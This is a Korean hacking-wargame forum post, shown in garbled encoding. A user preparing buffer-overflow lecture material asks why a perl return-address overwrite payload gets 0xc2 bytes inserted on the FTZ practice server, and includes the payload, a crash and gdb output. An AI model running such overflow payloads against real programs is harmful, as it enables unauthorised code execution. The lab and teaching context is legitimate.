¸®´ª½º

 3923, 5/197 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   smile0909
   ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_linux&no=4392 [º¹»ç]


°£´ÜÇÑ BOF¿¡ ´ëÇÑ °­ÀÇÀڷḦ ¸¸µé±â À§Çؼ­,  ftz¼­¹öÀÇ guest°èÁ¤À¸·Î ·Î±×ÀÎÇÏ¿© Å×½ºÆ® ÁßÀä.
ÄÄÆÄÀϽÿ¡ °É ¼ö ÀÖ´Â ¿É¼ÇÀº ¸ðµÎ °Ç »óÅÂÀ̱¸¿ä. (-z execstack -fno-builtin -mpreferred-stack-boundary=2)

bof°ø°ÝÀ¸·Î ½ºÅÃÀÇ return addressºÎºÐ¿¡ ÁÖ¼Ò°ª(\x92\x83\x04\x08)À» ³ÖÀ¸·Á°í Çϴµ¥ ¾ÈµÇ±æ·¡..
ÄÚ¾î´ýÇÁ¸¦ ¶°º¸´Ï, ÀÚ²Ù \xc2\x92\xc2\x83\xc2\x04\xc2\x08¿Í °°ÀÌ, Áß°£¿¡ \xc2°ªÀÌ µé¾î°¡°í ÀÖ´Â »óȲÀ̳׿ä.

charÇü ¹è¿­ bufferÅ©±â´Â 4À̱¸¿ä.
¾Æ·¡Ã³·³ ³ª¿É´Ï´Ù..

[guest@ftz test]$ perl -e 'print "a"x4,"b"x4,"\x92\x83\x04\x08"' | ./test
aaaabbbb혪혘
Segmentation fault (core dumped)
[guest@ftz test]$ gdb test core.9330
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
Core was generated by `./test'.
Program terminated with signal 11, Segmentation fault.
Cannot access memory at address 0x400160b0
#0  0x83c292c2 in ?? ()


Ȥ½Ã ½ºÅÃÂÊ¿¡ Çí»çÄڵ带 ³ÖÀ¸¸é Áß°£¿¡ ¾²·¹±â°ªÀÌ µé¾î°¡µµ·Ï ÀǵµÇϽŰǰ¡¿ä?
¿¹Àü¿¡´Â ºÐ¸íÈ÷ 됬´ø ¹æ½ÄÀε¥... ÀÌ»óÇϳ׿ä.. ÀÛ³âÀΰ¡ Á¦ÀÛ³âÀΰ¡´Â ºÐ¸íÈ÷ ftz¼­¹ö¿¡¼­µµ 됬´ø °Í °°Àºµ¥ ¿Ö °©Àڱ⠾ȵÇÁÒ?¤Ð¤Ð

+
¾Æ·¡¿Í °°ÀÌ, BOF¿øÁ¤´ë ¼­¹ö¿¡¼­´Â Àß µ¿ÀÛÇÕ´Ï´Ù. (Á¦°¡ guest°èÁ¤À» µû·Î ¸¸µé¾îµ×½À´Ï´Ù.)
[guest@localhost test]$ perl -e 'print "a"x4,"b"x4,"\x38\x84\x04\x08"' | ./test
aaaabbbb8?
bof success!
  Hit : 2440     Date : 2015/01/23 04:38


    
3843   ftz level1 ¿¡¼­ Áú¹® ÀÖ½À´Ï´Ù µµ¿ÍÁÖ¼¼¿ä ¤Ì¤Ð     bg3209
 03/04 2658
3842   ftz Áú¹®     ju031230
 03/02 2299
3841   I can't login with root on terminal (OS : fedora17)[6]     ±èº´±Ç
 01/29 2586
  ftz ¼­¹ö¿¡¼­ Çí»çÄڵ尡 ½ºÅÿ¡ »ðÀÔµÇÁö ¾Ê¾Æ¿ä¤Ð     smile0909
 01/23 2439
3839   ÅÚ³Ý ftz ¼­¹ö guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä[2]     ÁãÀÌ
 01/06 3021
3838   ÇØÄ¿½ºÄ𠸮´ª½º Æ®·¹À̴׿¡¼­ guest ºñ¹Ð¹øÈ£°¡ ¹º°¡¿ä??[1]     six6th
 01/06 2935
3837   hackerschool ·¹µåÇò ¸®´ª½º9.0°ü·ÃÁú¹®Àε¥¿ä     qotjddn6593
 01/06 2206
3836   CENT OS USB ¼³Ä¡ÈÄ ¹®Á¦     ifocean
 12/26 2822
3835   falcon os second °¡Áö°í ÀÖÀ¸½Å ¸ÚÁøºÐ ¾ø³ª¿ä?     jungkenji
 12/20 2536
3834   °©Àڱ⠻ý°¢³ª¼­ Áú¹®µå¸®´Âµ¥ ½º¸¶Æ®Æù¿¡ vmware[2]     nmy89
 12/17 3447
3833   ¸®´ª½º skelÀ̶ó´Â°Ô Á¤È­È÷¸ÓÁÒ?[2]     kdhan16
 12/17 3977
3832   kali linux¸¦ °¡»ó¸Ó½ÅÀ¸·Î ½ÇÇà½ÃÄ×À»¶§ ±Ã±ÝÇÑÁ¡[1]     cckcamp
 12/07 3931
3831   ÇØÄ¿½ºÄð°­Á ¸Û¸ÛÀÌÄÄÇ»Å͸¦Ã£¾Æ¶ó¿¡¼­.. ssh Æ÷Æ®¹øÈ£¾Ë¶§ telnetÀ¸·Î[1]     alsrbdu
 12/07 3216
3830   ¸®´ª½º x windows (VMware)[1]     inwoong32
 11/30 2454
3829   Ã¥À» °í¹ÎÇÏ°í ÀÖ½À´Ï´Ù.[2]     calliope7487
 11/19 2866
3828   ¹éÆ®·¢5 wlan0 Ĩ¼ÂÀÌ UnknownÀ¸·Î ³ªÅ¸³ª´Â°Ô ¹®Á¦°¡ µÇ³ª¿ä?     jeah9441
 11/14 2542
3827   VMware Backtrack5 USB¹«¼±·£Ä«µå Áú¹®     jeah96
 11/11 3107
3826   vi ¼Ò½º Äڵ带 º¸°í ½ÍÀºµ¥¿ä[2]     lionpoo
 11/11 2593
3825   °¡»ó¸Ó½Å¿¡ ¿ìºÐÅõ¸¦ ±ò°í ssh ¼³Ä¡ÈÄ °¡»ó¸Ó½Å ÀÚü¿¡¼­ Æ÷Æ®Æ÷¿öµù°ú °øÀ¯±â Æ÷Æ®Æ÷¿öµù¿¡¼­ÀÇ ¹®Á¦°¡...     ehaakdl
 11/01 2966
3824   ¸®´ª½º Å͹̳Π⠾°Ô ¶ç¿ì³ª¿ä?[2]     cksrjfl1996
 10/09 4720
[1][2][3][4] 5 [6][7][8][9][10]..[197]

Copyright 1999-2023 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org & Wowhacker.com